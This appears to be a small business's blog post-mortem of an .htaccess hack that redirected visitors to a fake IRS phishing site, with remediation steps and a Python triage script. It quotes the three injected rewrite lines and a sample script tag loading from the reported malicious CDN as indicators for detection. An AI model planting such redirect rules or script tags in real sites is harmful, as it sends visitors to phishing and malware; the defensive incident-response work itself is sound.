We noticed something was wrong when a user messaged us saying our website was redirecting them to what looked like a fake government site. We checked. It was.

This is what happened next, in precise detail — because we couldn't find a clear account of this specific type of hack when it was happening to us, and we want this to be useful to anyone else in the same situation.

What the hack looked like

Anyone visiting umamicasa.com was being silently redirected to a domain called gov-lrs.theleaftable.com/irs — a fake IRS-lookalike phishing site. The redirect was happening server-side, which meant it affected all visitors regardless of browser or device.

A scan via Sucuri SiteCheck confirmed two issues: a redirect hack and a malicious JavaScript injection from cdn.jsinit.directfwd.com. Google Safe Browsing hadn't flagged us yet, which meant we hadn't lost search rankings — but we would have, quickly, if we hadn't acted.

Finding the malicious code

We logged into GoDaddy cPanel and opened File Manager. The first thing we looked for was recently modified files. The date column in File Manager shows when each file was last written, which is a good first filter as long as the attacker hasn't bothered to reset the timestamps. The .htaccess file in public_html had been modified on a date we didn't recognise.

We opened it. Lines 11, 12, and 13 were the problem:

RewriteCond %{HTTP_HOST} ^umamicasa\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.umamicasa\.com$
RewriteRule ^/?$ "https://gov-lrs.theleaftable.com/irs" [R=301,L]

Three lines. That's all it took: the two RewriteCond lines match either hostname (the [OR] joins them), and the RewriteRule's ^/?$ pattern catches requests for the site root, so everyone who landed on the home page got a permanent (301) redirect to the phishing site.

The fix was equally simple: delete those three lines, save the file. The redirect stopped immediately. Total time from diagnosis to fix: under 20 minutes.
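To make the "recently modified, then read the redirect rules" triage repeatable, here is an added example (not tooling from the post, from Sucuri, or from GoDaddy). It assumes a copy of the document root on local disk and that the site's own hostnames are known; the sample .htaccess and HTML files are constructed here, and the only things taken from the post are the three injected lines and the two domains Sucuri reported. It flags any RewriteRule, Redirect or RedirectMatch whose target is an absolute URL on an outside host, lists files written in the last week, and greps the whole tree for the indicator domains, so the JavaScript injection gets looked for as well as the redirect.

```python
"""Triage helpers for an .htaccess redirect hack (added example, not from the post)."""
import os
import re
import shlex
import tempfile
import time
from urllib.parse import urlparse

# Hosts the site is allowed to redirect to; anything else is off-site.
OWN_HOSTS = {"umamicasa.com", "www.umamicasa.com"}

# Strings worth grepping for across the document root (the two domains from the post).
INDICATORS = ("gov-lrs.theleaftable.com", "cdn.jsinit.directfwd.com")

# Directives that can send a visitor elsewhere: mod_rewrite and mod_alias.
DIRECTIVE = re.compile(r"^\s*(RewriteRule|RedirectMatch|Redirect)\s+(.+?)\s*$", re.I)


def offsite_redirects(htaccess_text, own_hosts=OWN_HOSTS):
    """(line_no, target) for each redirect directive pointing at a host outside own_hosts.

    Relative targets such as /menu are skipped. A RewriteRule whose target is an
    absolute off-site URL redirects even without [R], so flags are not consulted.
    """
    hits = []
    for n, line in enumerate(htaccess_text.splitlines(), 1):
        m = DIRECTIVE.match(line)
        if not m:
            continue
        directive, rest = m.group(1).lower(), m.group(2)
        try:
            args = shlex.split(rest)  # strips the quotes around the injected target
        except ValueError:
            args = rest.split()
        if len(args) < 2:
            continue
        # RewriteRule pattern target [flags]  /  Redirect[Match] [status] path url
        target = args[1] if directive == "rewriterule" else args[-1]
        host = urlparse(target).hostname
        if host and host.lower() not in own_hosts:
            hits.append((n, target))
    return hits


def recently_modified(root, days=7, now=None):
    """Relative paths of files under root written in the last `days`, newest first.

    Caveat: mtime is whatever the last writer set; an attacker can reset it,
    so this finds careless intrusions, not all of them.
    """
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            mtime = os.path.getmtime(path)
            if mtime >= cutoff:
                found.append((mtime, os.path.relpath(path, root)))
    return [p for _, p in sorted(found, reverse=True)]


def files_containing(root, indicators=INDICATORS):
    """Sorted relative paths of files under root containing any indicator string."""
    matches = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            if any(ind.encode() in data for ind in indicators):
                matches.append(os.path.relpath(path, root))
    return sorted(matches)


# Constructed sample: a normal canonical-host redirect, a relative redirect, the
# three injected lines quoted in the post, and a mod_alias variant of the same.
SAMPLE_HTACCESS = """\
RewriteEngine On
# legitimate canonical-host redirect (constructed)
RewriteCond %{HTTP_HOST} ^umamicasa\\.com$
RewriteRule ^(.*)$ https://www.umamicasa.com/$1 [R=301,L]
RewriteRule ^old-menu$ /menu [R=301,L]
# the three injected lines quoted in the post
RewriteCond %{HTTP_HOST} ^umamicasa\\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\\.umamicasa\\.com$
RewriteRule ^/?$ "https://gov-lrs.theleaftable.com/irs" [R=301,L]
# a mod_alias variant of the same thing (constructed)
Redirect 302 /login https://gov-lrs.theleaftable.com/irs
"""

# Constructed page with a script tag on the domain Sucuri reported (path not from the post).
SAMPLE_INDEX = '<html><body><script src="https://cdn.jsinit.directfwd.com/"></script></body></html>\n'


def build_sample_site():
    """Write the constructed document root to a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="umamicasa_")
    for name, body in ((".htaccess", SAMPLE_HTACCESS), ("index.html", SAMPLE_INDEX),
                       ("menu.html", "<html><body>menu</body></html>\n")):
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    old = time.time() - 30 * 86400
    os.utime(os.path.join(root, "menu.html"), (old, old))  # untouched for a month
    return root


def triage(root):
    """Run the three checks against a document root and return the results."""
    with open(os.path.join(root, ".htaccess")) as fh:
        rules = offsite_redirects(fh.read())
    return {"recent": recently_modified(root), "offsite_redirects": rules,
            "indicator_hits": files_containing(root)}


if __name__ == "__main__":
    for key, value in triage(build_sample_site()).items():
        print(f"{key}: {value}")
```

Against the constructed root this flags lines 9 and 11 of the sample .htaccess, lists .htaccess and index.html as written this week, and reports both files as carrying an indicator domain; menu.html, a month old and clean, stays out of every list. Point `triage()` at a downloaded copy of public_html to run it for real, and treat an empty "recent" list as inconclusive rather than clean.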

How it got there

The most likely explanation: an outdated Drupal module with a known vulnerability. The attacker found the vulnerability via automated scanning, used it to get write access to the filesystem, and added those three lines to .htaccess. The entire operation probably took them less than two minutes.

This is how most website hacks work. It's not targeted. It's automated. Bots scan the internet for known vulnerabilities and exploit them at scale. Your website isn't special to the attacker — it's just one of thousands they compromised that week.

What we did after removing the malware

Changed all passwords immediately: GoDaddy account, cPanel, CMS admin, database. Updated all CMS modules and core to their latest versions. Set up Cloudflare (free tier) as a firewall layer in front of the site, which only helps if the origin server isn't still reachable directly by its IP. Scheduled weekly Sucuri scans.

We also moved the site off Drupal entirely, not because Drupal is insecure, but because a static HTML site has a dramatically smaller attack surface. There's no CMS to exploit, no database to inject, no plugin vulnerabilities to scan for. What remains is the hosting account itself and the web server's own configuration, .htaccess included, and those still need protecting.

The GoDaddy upsell, and why we ignored it

When we contacted GoDaddy support about the hack, the agent immediately pivoted to selling us a ₹16,740 "web security plan." We declined. The fix — deleting three lines from a file — was free and took twenty minutes. The upsell was real money for a problem we could solve ourselves with basic file manager access.

We're not saying security tools have no value. We're saying that for a small site with a specific, identified problem, the first step is always to understand what you're dealing with before spending money on a solution.